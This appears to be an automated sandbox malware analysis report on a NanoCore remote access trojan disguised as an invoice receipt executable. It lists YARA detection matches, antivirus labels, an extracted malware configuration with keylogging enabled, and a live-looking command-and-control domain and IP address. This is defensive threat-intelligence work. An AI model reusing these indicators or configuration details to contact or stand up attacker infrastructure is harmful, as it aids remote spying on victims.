14.0.chmac.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.2.chmac.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.2.chmac.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.0.chmac.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.0.chmac.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
14.0.chmac.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
15.2.chmac.exe.2540000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
15.2.chmac.exe.2540000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
15.2.chmac.exe.2540000.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
15.2.chmac.exe.2540000.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
Click to see the 341 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "1f8684ca-0835-4252-89d1-4a2b1be1", "Group": "boy of john", "Domain1": "boyhome5100.duckdns.org", "Domain2": "boyhome5100.duckdns.org", "Port": 5100, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Antivirus detection for URL or domain

Show sources

Source: boyhome5100.duckdns.org

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe

ReversingLabs: Detection: 42%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 14.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.4830000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.658288.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.1.chmac.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37ac01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30b1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3011458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b547d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.chmac.exe.3000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.50a9b8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.3960e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.2260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.24b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2551458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.395c01e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.339547057.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.344485087.0000000002540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340666322.00000000004F4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359590843.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.341018876.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297135620.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.340553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.358899493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359622615.000000000391A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.293187290.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294042312.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.359413916.0000000002502000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000001.325215386.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: chmac.exe PID: 6820, type: MEMORYSTR

Source: 16.0.chmac.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.chmac.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.chmac.exe.4830000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.chmac.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.2.G2M8C76V_INV0ICE_RECEIPT.exe.30f0000.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 16.0.chmac.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.1.chmac.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.1.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.2.chmac.exe.2500000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.1.chmac.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.chmac.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.2.chmac.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.chmac.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.chmac.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.chmac.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.chmac.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Unpacked PE file: 14.2.chmac.exe.4830000.9.unpack
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Unpacked PE file: 16.2.chmac.exe.2500000.4.unpack

Source: G2M8C76V_INV0ICE_RECEIPT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293275271.0000000003380000.00000004.00000001.sdmp, G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293559055.0000000003510000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312413916.00000000031E0000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312089409.0000000003050000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.334018187.0000000003130000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.332132170.00000000032C0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293275271.0000000003380000.00000004.00000001.sdmp, G2M8C76V_INV0ICE_RECEIPT.exe, 00000000.00000003.293559055.0000000003510000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312413916.00000000031E0000.00000004.00000001.sdmp, chmac.exe, 0000000D.00000003.312089409.0000000003050000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.334018187.0000000003130000.00000004.00000001.sdmp, chmac.exe, 0000000F.00000003.332132170.00000000032C0000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_00405D7C FindFirstFileA,FindClose,	0_2_00405D7C
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004053AA
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe	Code function: 3_1_00404A29 FindFirstFileExW,	3_1_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_00405D7C FindFirstFileA,FindClose,	13_2_00405D7C
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	13_2_004053AA
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 13_2_00402630 FindFirstFileA,	13_2_00402630
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_2_00404A29 FindFirstFileExW,	14_2_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 14_1_00404A29 FindFirstFileExW,	14_1_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_00405D7C FindFirstFileA,FindClose,	15_2_00405D7C
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	15_2_004053AA
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 15_2_00402630 FindFirstFileA,	15_2_00402630
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_2_00404A29 FindFirstFileExW,	16_2_00404A29
Source: C:\Users\user\AppData\Roaming\dihsw\chmac.exe	Code function: 16_1_00404A29 FindFirstFileExW,	16_1_00404A29

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: boyhome5100.duckdns.org

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: boyhome5100.duckdns.org

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: Joe Sandbox View

IP Address: 194.5.98.28 194.5.98.28

Source: global traffic

TCP traffic: 192.168.2.3:49743 -> 194.5.98.28:5100

Source: chmac.exe, chmac.exe, 0000000F.00000000.324531335.0000000000409000.00000008.00020000.sdmp, chmac.exe, 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp, chmac.exe, 00000010.00000000.330014937.0000000000409000.00000008.00020000.sdmp, G2M8C76V_INV0ICE_RECEIPT.exe, chmac.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: G2M8C76V_INV0ICE_RECEIPT.exe, chmac.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown

DNS traffic detected: queries for: boyhome5100.duckdns.org

Source: chmac.exe, 0000000D.00000002.326522956.00000000007CA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: chmac.exe, 0000000E.00000002.341299575.000000000376A000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe

